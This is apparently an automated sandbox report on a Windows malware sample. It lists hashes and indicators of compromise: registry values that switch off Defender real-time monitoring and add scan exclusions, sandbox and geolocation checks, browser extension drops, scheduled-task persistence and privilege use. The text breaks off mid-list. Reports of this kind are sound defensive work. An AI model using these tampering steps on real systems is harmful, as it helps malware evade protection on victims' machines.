Analysis
-
max time kernel
230s -
max time network
231s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
04/07/2024, 22:38
Static task
static1
Behavioral task
behavioral1
Sample
79e8f4fc847eecf2096e96dd5895a371b40a5f9f9533f99ea755210dbc390c17.exe
Resource
win7-20240419-en
General
-
Target
79e8f4fc847eecf2096e96dd5895a371b40a5f9f9533f99ea755210dbc390c17.exe
-
Size
7.3MB
-
MD5
9b4d40d862a5b8fc72c6551f44b4bf09
-
SHA1
1f1585afb8d3c85893d2ab77f84419776a1291b9
-
SHA256
79e8f4fc847eecf2096e96dd5895a371b40a5f9f9533f99ea755210dbc390c17
-
SHA512
8ca4799f202f7a3093e5951b911971a586731b18b8c2a3ab166d5306e37e89aa511aad9cf8ec1703c8777a4ff4f43ec6f68997f84eba7993cd1958dc0627db45
-
SSDEEP
196608:91OUTxStjKgL80gHQBsGOD9vtGQo0ba/4a6beuy:3OUFSjKWgxWQo0c4a6yuy
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fLdzueVMGzfAC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nWWVEJXizSHU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\uYPtQNsySKcOueCgHDR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\XwIFwyvoUqntekhn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fLdzueVMGzfAC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\uYPtQNsySKcOueCgHDR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ushFnVEJKMUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\evUSZSaqPkAEukVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\XwIFwyvoUqntekhn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\evUSZSaqPkAEukVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\XwIFwyvoUqntekhn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RNplELueU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RNplELueU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nWWVEJXizSHU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\XwIFwyvoUqntekhn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ushFnVEJKMUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 27 3056 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 3024 powershell.exe 2300 powershell.EXE 2804 powershell.exe 2764 powershell.exe 2912 powershell.exe 2064 powershell.EXE 928 powershell.EXE -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Control Panel\International\Geo\Nation ooklDxj.exe -
Executes dropped EXE 4 IoCs
pid Process 2084 Install.exe 3044 Install.exe 2868 YshyKtE.exe 396 ooklDxj.exe -
Loads dropped DLL 23 IoCs
pid Process 2456 79e8f4fc847eecf2096e96dd5895a371b40a5f9f9533f99ea755210dbc390c17.exe 2084 Install.exe 2084 Install.exe 2084 Install.exe 2084 Install.exe 3044 Install.exe 3044 Install.exe 3044 Install.exe 2884 WerFault.exe 2884 WerFault.exe 2884 WerFault.exe 3056 rundll32.exe 3056 rundll32.exe 3056 rundll32.exe 3056 rundll32.exe 1488 WerFault.exe 1488 WerFault.exe 1488 WerFault.exe 1488 WerFault.exe 1488 WerFault.exe 1884 WerFault.exe 1884 WerFault.exe 1884 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json ooklDxj.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json ooklDxj.exe -
Drops file in System32 directory 24 IoCs
description ioc Process File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol YshyKtE.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 ooklDxj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 ooklDxj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 ooklDxj.exe File created C:\Windows\system32\GroupPolicy\gpt.ini YshyKtE.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini YshyKtE.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ooklDxj.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 ooklDxj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 ooklDxj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 ooklDxj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol YshyKtE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ooklDxj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 ooklDxj.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol ooklDxj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 ooklDxj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat ooklDxj.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi ooklDxj.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ooklDxj.exe File created C:\Program Files (x86)\RNplELueU\QhBwWFM.xml ooklDxj.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi ooklDxj.exe File created C:\Program Files (x86)\nWWVEJXizSHU2\URIDowUpTyHCn.dll ooklDxj.exe File created C:\Program Files (x86)\uYPtQNsySKcOueCgHDR\aLiRbjg.xml ooklDxj.exe File created C:\Program Files (x86)\fLdzueVMGzfAC\mRYDvJm.dll ooklDxj.exe File created C:\Program Files (x86)\fLdzueVMGzfAC\ifyJsaU.xml ooklDxj.exe File created C:\Program Files (x86)\ushFnVEJKMUn\EDRXzkq.dll ooklDxj.exe File created C:\Program Files (x86)\RNplELueU\RDwpyC.dll ooklDxj.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja ooklDxj.exe File created C:\Program Files (x86)\nWWVEJXizSHU2\gxkBXHV.xml ooklDxj.exe File created C:\Program Files (x86)\uYPtQNsySKcOueCgHDR\rKLFFco.dll ooklDxj.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bBfKaGDnIKdTdJZScE.job schtasks.exe File created C:\Windows\Tasks\QVuDljbAZykxnpoWI.job schtasks.exe File created C:\Windows\Tasks\wgFtIVrBuHdIdLf.job schtasks.exe File created C:\Windows\Tasks\vczjtXgpVbXDKOBgh.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 2884 2868 WerFault.exe 41 1488 3044 WerFault.exe 29 1884 396 WerFault.exe 185 -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates ooklDxj.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{971DD4CF-DE6A-4F56-80BC-B1C9E13BEF6C} ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{971DD4CF-DE6A-4F56-80BC-B1C9E13BEF6C}\22-f8-b3-3d-12-dd ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ YshyKtE.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates ooklDxj.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\22-f8-b3-3d-12-dd\WpadDecisionTime = d0aa314563ceda01 rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\22-f8-b3-3d-12-dd\WpadDetectedUrl rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000d09f133263ceda01 YshyKtE.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\22-f8-b3-3d-12-dd rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 ooklDxj.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 7054373263ceda01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{971DD4CF-DE6A-4F56-80BC-B1C9E13BEF6C}\WpadNetworkName = "Network 3" ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\22-f8-b3-3d-12-dd ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople ooklDxj.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\22-f8-b3-3d-12-dd\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad ooklDxj.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs ooklDxj.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" ooklDxj.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\22-f8-b3-3d-12-dd\WpadDecision = "0" ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My ooklDxj.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{971DD4CF-DE6A-4F56-80BC-B1C9E13BEF6C}\WpadDecision = "0" ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs ooklDxj.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00cf000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00cf000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings ooklDxj.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" YshyKtE.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs ooklDxj.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs ooklDxj.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" YshyKtE.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs ooklDxj.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs ooklDxj.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2540 schtasks.exe 2720 schtasks.exe 3012 schtasks.exe 2860 schtasks.exe 1728 schtasks.exe 3048 schtasks.exe 2796 schtasks.exe 2776 schtasks.exe 1336 schtasks.exe 1776 schtasks.exe 2400 schtasks.exe 1800 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 45 IoCs
pid Process 2912 powershell.exe 2064 powershell.EXE 2064 powershell.EXE 2064 powershell.EXE 928 powershell.EXE 928 powershell.EXE 928 powershell.EXE 3024 powershell.exe 2300 powershell.EXE 2300 powershell.EXE 2300 powershell.EXE 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 2804 powershell.exe 2764 powershell.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe 396 ooklDxj.exe -
Suspicious use of AdjustPrivilegeToken 63 IoCs
description pid Process Token: SeDebugPrivilege 2912 powershell.exe Token: SeIncreaseQuotaPrivilege 2536 WMIC.exe Token: SeSecurityPrivilege 2536 WMIC.exe Token: SeTakeOwnershipPrivilege 2536 WMIC.exe Token: SeLoadDriverPrivilege 2536 WMIC.exe Token: SeSystemProfilePrivilege 2536 WMIC.exe Token: SeSystemtimePrivilege 2536 WMIC.exe Token: SeProfSingleProcessPrivilege 2536 WMIC.exe Token: SeIncBasePriorityPrivilege 2536 WMIC.exe Token: SeCreatePagefilePrivilege 2536 WMIC.exe Token: SeBackupPrivilege 2536 WMIC.exe Token: SeRestorePrivilege 2536 WMIC.exe Token: SeShutdownPrivilege 2536 WMIC.exe Token: SeDebugPrivilege 2536 WMIC.exe Token: SeSystemEnvironmentPrivilege 2536 WMIC.exe Token: SeRemoteShutdownPrivilege 2536 WMIC.exe Token: SeUndockPrivilege 2536 WMIC.exe Token: SeManageVolumePrivilege 2536 WMIC.exe Token: 33 2536 WMIC.exe Token: 34 2536 WMIC.exe Token: 35 2536 WMIC.exe Token: SeDebugPrivilege 2064 powershell.EXE Token: SeDebugPrivilege 928 powershell.EXE Token: SeDebugPrivilege 3024 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2372 WMIC.exe Token: SeIncreaseQuotaPrivilege 2372 WMIC.exe Token: SeSecurityPrivilege 2372 WMIC.exe Token: SeTakeOwnershipPrivilege 2372 WMIC.exe Token: SeLoadDriverPrivilege 2372 WMIC.exe Token: SeSystemtimePrivilege 2372 WMIC.exe Token: SeBackupPrivilege 2372 WMIC.exe Token: SeRestorePrivilege 2372 WMIC.exe Token: SeShutdownPrivilege 2372 WMIC.exe Token: SeSystemEnvironmentPrivilege 2372 WMIC.exe Token: SeUndockPrivilege 2372 WMIC.exe Token: SeManageVolumePrivilege 2372 WMIC.exe Token: SeDebugPrivilege 2300 powershell.EXE Token: SeDebugPrivilege 2804 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2100 WMIC.exe Token: SeIncreaseQuotaPrivilege 2100 WMIC.exe Token: SeSecurityPrivilege 2100 WMIC.exe Token: SeTakeOwnershipPrivilege 2100 WMIC.exe Token: SeLoadDriverPrivilege 2100 WMIC.exe Token: SeSystemtimePrivilege 2100 WMIC.exe Token: SeBackupPrivilege 2100 WMIC.exe Token: SeRestorePrivilege 2100 